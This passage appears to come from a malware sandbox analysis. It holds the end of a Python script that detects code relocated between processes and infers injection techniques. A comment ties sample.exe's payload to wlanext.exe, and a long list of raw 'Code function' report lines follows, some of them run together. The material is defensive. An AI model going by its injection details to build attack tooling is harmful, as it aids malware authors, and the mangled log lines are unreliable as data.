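    return {key: frozenset(entries) for key, entries in tables.items()}


def relocated_copies(tables, min_entries=2):
    """Region pairs in different processes whose fingerprints are identical,
    i.e. the same code sitting at two bases. Raise min_entries to cut noise."""
    pairs = []
    for a, b in combinations(sorted(tables), 2):
        if a[0] != b[0] and tables[a] == tables[b] and len(tables[a]) >= min_entries:
            pairs.append((a, b))
    return pairs


def injection_capabilities(records):
    """Per PID, the techniques for which every required call site is present."""
    seen = defaultdict(set)
    for pid, _addr, calls in records:
        seen[pid].update(calls)
    return {pid: {name for name, need in TECHNIQUES.items() if need <= calls}
            for pid, calls in seen.items()}


if __name__ == "__main__":
    recs = parse_rows(ROWS)
    for (p1, b1), (p2, b2) in relocated_copies(stub_tables(recs)):
        print(f"pid {p1} region {b1:#010x} reappears in pid {p2} at {b2:#010x}")
    for pid, caps in sorted(injection_capabilities(recs).items()):
        print(f"pid {pid}: {', '.join(sorted(caps)) or 'none'}")
```

Run against the full row list the fingerprint check pairs both regions of sample.exe with their counterparts in wlanext.exe; the 0x0041xxxx to 0x02FE9xxx pair matches the Yara hits on the 0x400000 and 0x02FD0000 PAGE_EXECUTE_READWRITE dumps of those two processes, so the stub table and the payload moved together.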
Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_010BAC70
Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_010BD590
Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_04FE3908
Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_05D9C9D0
Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_05D95E50
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0041E824
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0040102B
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00401030
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0041D2BB
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00402D87
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00402D90
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00409E20
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0041CEE3
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_00402FB0
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_017F4120
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_017DF900
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_017F99BF
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018020A0
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018A20A8
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_017FA830
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018A28EC
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_01891002
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018AE824
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_017EB090
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0180EBB0
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_017FAB40
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018903DA
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0180ABD8
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_0189DBD2
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_018823E3
Source: C:\Users\user\Desktop\sample.exe | Code function: 1_2_017FA309
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A2B281_2_018A2B28
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A22AE1_2_018A22AE
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_01894AEF1_2_01894AEF
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0188FA2B1_2_0188FA2B
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018025811_2_01802581
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A25DD1_2_018A25DD
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017D0D201_2_017D0D20
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A2D071_2_018A2D07
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017ED5E01_2_017ED5E0
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A1D551_2_018A1D55
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018944961_2_01894496
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017E841F1_2_017E841F
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0189D4661_2_0189D466
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018ADFCE1_2_018ADFCE
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A1FF11_2_018A1FF1
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_017F6E301_2_017F6E30
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_018A2EF71_2_018A2EF7
          Source: C:\Users\user\Desktop\sample.exeCode function: 1_2_0189D6161_2_0189D616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036B2B283_2_036B2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036A03DA3_2_036A03DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_036ADBD23_2_036ADBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0361EBB03_2_0361EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_0369FA2B3_2_0369FA2B